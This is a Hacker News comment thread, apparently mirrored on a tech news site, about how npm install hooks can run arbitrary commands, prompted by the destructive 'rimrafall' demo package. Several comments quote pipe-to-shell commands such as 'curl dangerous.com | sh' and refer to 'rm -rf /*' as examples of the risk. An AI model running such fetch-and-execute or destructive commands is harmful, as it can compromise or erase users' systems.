科技回声 (Tech Echo)

A tech news platform built on Next.js, providing global tech news and discussion.

© 2025 科技回声. All rights reserved.

Npm install could be dangerous

122 points, by joaojeronimo, over 10 years ago

23 comments

moe, over 10 years ago
This applies to pretty much every pkg manager ever created.

That's why it's important to have end-to-end package signing with a reasonable UI, so people can choose to selectively trust the sources they need and get alerted *before* new dependencies get pulled in.

Sadly I don't know of any pkg manager that implements this correctly.
jfroma, over 10 years ago
If you run npm with root, npm will run scripts with the user "nobody" by default. This means that npm doesn't run scripts as root even if you run "npm install" with root.

You can set another user instead of nobody with the "user" option and you can disable switching UID/GID using the "unsafe-perm" option but DO NOT DO THIS.

More information here: https://docs.npmjs.com/misc/config

edit: added more details.
attilagyorffy, over 10 years ago
This is exactly why I think modern kernel-level security layers, such as FreeBSD jails (or Docker/LXC), were born. Provided your app runs within a jail, it wouldn't matter much anymore:

> Once inside the jail, a process is not permitted to escape outside of this subtree

You could also develop within isolation, therefore your development env would be safer and even similar to a production environment. Needless to say, that has additional benefits.
illumen, over 10 years ago
npmjs still contains the package: https://www.npmjs.com/search?q=rimrafall https://www.npmjs.com/package/rimrafall

'0 downloads in the last month'

There is no 'report package' button. The support link goes to a 'we are hiring' contact form. Report bad packages as security issues? https://www.npmjs.com/security

Package signing. Review process. Scanning tools for dangerous packages. As a user, don't trust anything and isolate containers and jails. Ban bad actors. Charge for a curated package index.

Lots of other plugin stores do better than npm.
rooodini, over 10 years ago
> […] as dangerous as `curl dangerous.com | sh`.

dangerous.com appears to be a saucy outfits retailer. Irrespective of the name, piping the html to sh is probably fine.
scljstcwombat, over 10 years ago
It's always been amateur hour over there. The 'official' install was `curl http://npmjs.org/install.sh | sh`[1], package checksums aren't uniformly checked, the list goes on.

But don't worry guys, they had a security audit[2].

[1] http://web.archive.org/web/20101228041356/http://npmjs.org/
[2] http://blog.npmjs.org/post/80277229932/newly-paranoid-maintainers
tootie, over 10 years ago
I could just as easily embed something like that in any code on any open source project in any language as part of the installer or the main code base.
detaro, over 10 years ago
Somehow I feel like using something that just simulates rm -rf /* would have brought the point across just as well and a bit safer...
ffn, over 10 years ago
Just another reason to install nodejs with a node versioning machine like nvm or n... or to chown your /usr dir so you don't have to run sudo every time you want to npm install. Since you need super user privileges to accidentally remove your system on most linux distros, it really helps if you don't form the habit of sudo npm installing everything.
endergen, over 10 years ago
Any package manager, especially one with fuzzy matching, is extremely dangerous. Every time you do an install you are often pulling hundreds of modules from many many places. If any one of the codebases of a module were compromised, even by a sneaky contributor, you could inject arbitrary code into any company's codebase/runtime.

Until object capability type systems become more popular, this will always be an issue. Unless you hand audit everything. Good luck being productive doing that, if you even have the skills or team members able to audit code.
tenderlove, over 10 years ago
It's not just Npm, RubyGems has essentially the same issue. I think the real lesson is "be careful what you install".
raesene5, over 10 years ago
This is a problem with most/all lib installers. They tend to have hooks to allow post-install actions and those hooks tend to be able to run OS commands, with the privileges of the installing user.

Of course what's extra worrying is it's not just the libs you directly install, but all their dependencies which get to carry out these actions. So for example when you install rails, it will install quite a large number of subsidiary gems.

Then when you add in the fact that the credentials that control dev access to push to places like rubygems and npm are just static username/password combos (which sometimes get stored in plain text in a dot file in the developers home dir) and that there's no common use of digital signing for issued libs (in some cases the installers don't even support it).
mofle, over 10 years ago
There are some things you can do to make `rm` safer which would prevent this from working: https://github.com/sindresorhus/guides/blob/master/how-not-to-rm-yourself.md#safeguard-rm

Though the real fix is doing development in a sandboxed container.
samspot, over 10 years ago
https://github.com/joaojeronimo/rimrafall/issues/2 hehehe
XorNot, over 10 years ago
So this doesn't strike me as an npm issue but something more fundamental: there is no easy way on any platform to define a set of rules for processes I invoke via the command line.

Like, it would be really really nice if I could wrap npm so it can only write to $HOME/.npm, /tmp and the current working directory - but I know of no system which will currently let me do that suitably dynamically.
detaro, over 10 years ago
Slight OT: does anyone know of any hacking/malware campaigns that were specifically aimed at developers (but not against a specific company)? Normal trojans sometimes steal game keys, I could imagine searching the disk for AWS keys might be profitable, too?
serve_yay, over 10 years ago
Computing could be dangerous.
runj__, over 10 years ago
More of a joke but:

npm install virus.exe

Perfect for the #scalenpm tshirts

https://github.com/peny/virus.exe
zobzu, over 10 years ago
Awareness for this is always good. Many now just have scripts doing curl blah | sudo and expecting the blah url will always serve the content they expect. Signed versions seem to be the current best way to not have problems, even though it's not perfect.

And of course, most things like npm either don't support this or don't support it well, or nobody cares about it.
krisdol, over 10 years ago
Well, under no circumstance should you run npm, nvm, rvm, rbenv, pip, etc as root.
talles, over 10 years ago
> can be as dangerous as curl dangerous.com | sh

What's *dangerous.com*?
tomphoolery, over 10 years ago
It would be cool if there was a way to show which commands npm was running in its scripts.
dhruvbird, over 10 years ago
Can I do the same with Makefiles?